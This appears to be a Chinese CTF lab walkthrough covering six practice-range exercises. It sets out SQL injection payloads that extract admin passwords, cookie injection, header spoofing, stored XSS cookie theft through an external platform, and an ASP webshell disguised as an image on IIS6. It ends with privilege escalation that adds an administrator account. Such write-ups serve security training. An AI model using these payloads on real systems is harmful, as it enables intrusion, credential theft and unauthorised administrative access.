需要看的话直接下附件吧
一、1. 首先进入靶场
点击查看新闻进入http://117.41.229.122:8003/?id=1,尝试寻找是否存在sql注入点。
2.首先and 1=1 ,返回结果如下:
and 1 = 2,返回结果如下:
这里基本可以判断存在注入点。
3.采用二分法从10开始,order by 10,
直到order by 2时,
注入点为2。
and 1=2 union select 1,2查出字段数
4.确定数据库版本:
and 1=2 union select 1,version(),确定数据库版本为5.5.53
and 1=2 union select 1,database()
查询表名:
and 1=2 union select 1,table_name from information_schema.tables where table_schema=database()
最后查询密码:
and 1=2 union select 1,password from admin
附资料链接:
https://jiayi.space/post/sqlzhu-ru-ji-ch。
二、
1、 进入靶场,点开一个新闻,and 1 = 1发现被拦截了
2、 尝试使用cookie
添加一个Cookie头,并写值为id=171,改id=170同样正常,说明可以使用cookie
3、 确定字段数
order+by+10正常,11出错,所以字段数10。
4、 注入171+union+select+1,2,3,4,5,6,7,8,9,10+from+admin
回显点2,3,7,8,9,任选两个分别填入最常见的管理表字段名Username和Password, id=171+union+select+1,2,3,4,5,6,7, username,password,10+from+admin
得到管理员用户名和密码,进入https://cmd5.com/解密得明文:welcome
进入后台http://120.203.13.111:8001/admin/,拿到flag
三、
1、 进入管理员界面http://120.203.13.75:8001/admin123/Login.asp
登录,不允许从外部链接访问。
2、 抓包
使用ModHeader插件,将Host设置为127.0.0.1:8080,Referer设置为http://127.0.0.1/admin123/default.asp.
登录拿到flag
四、
存储型XSS
在https://xsspt.com上创建项目,将如何使用一栏的代码复制进留言板,提交刷新。
进入自己的项目,查看,拿到flag和cookie。
五、
进入靶场,F12,选择Application,找到cookie一项,将上次获得的cookie分别改入进去
改:
Name Value
ADMINSESSIONIDCSTRCSDQ LBMLMBCCNPFINOANFGLPCFBC
右侧不方便,改成下方
刷新页面进入管理后台
寻找上传点,在产品管理中找到上传点
编写一句话asp木马并上传
限制上传类型,因为得知系统使用的是iis6.0,查找漏洞
不可行。
制作图片木马:记事本打开图片,插入一句话木马,保存。
成功上传
打开菜刀添加,图片地址,以及密码
修改脚本类型为ASP
双击进入405,未被执行,我们得知,上传cer文件,iis6.0会解且执行
重命名.cer上传。
重新连接进入E盘,拿到flag
也可以通过CMD将a.png和b.asp合成为c.png
copy a.png/b+b.asp c.png
六、接上次的菜刀虚拟终端whoami没权限
上传自己的cmd.exe
虚拟终端
上传iis6.exe
通过iis6达到获取权限的目的 路径iis6.exe “whoami”
E:5\Menu\iis6.exe "net user minguoyu 123321 /add"添加用户 密码
E:5\Menu\iis6.exe "net localgroup administrators minguoyu /add" 加入管理组
OK,远程登录。
进入C盘,拿到flag
打赏我,让我更有动力~
公开课靶场1到6.rar 文件大小:4.215M (下载次数:6)
© 2016 - 2024 掌控者 All Rights Reserved.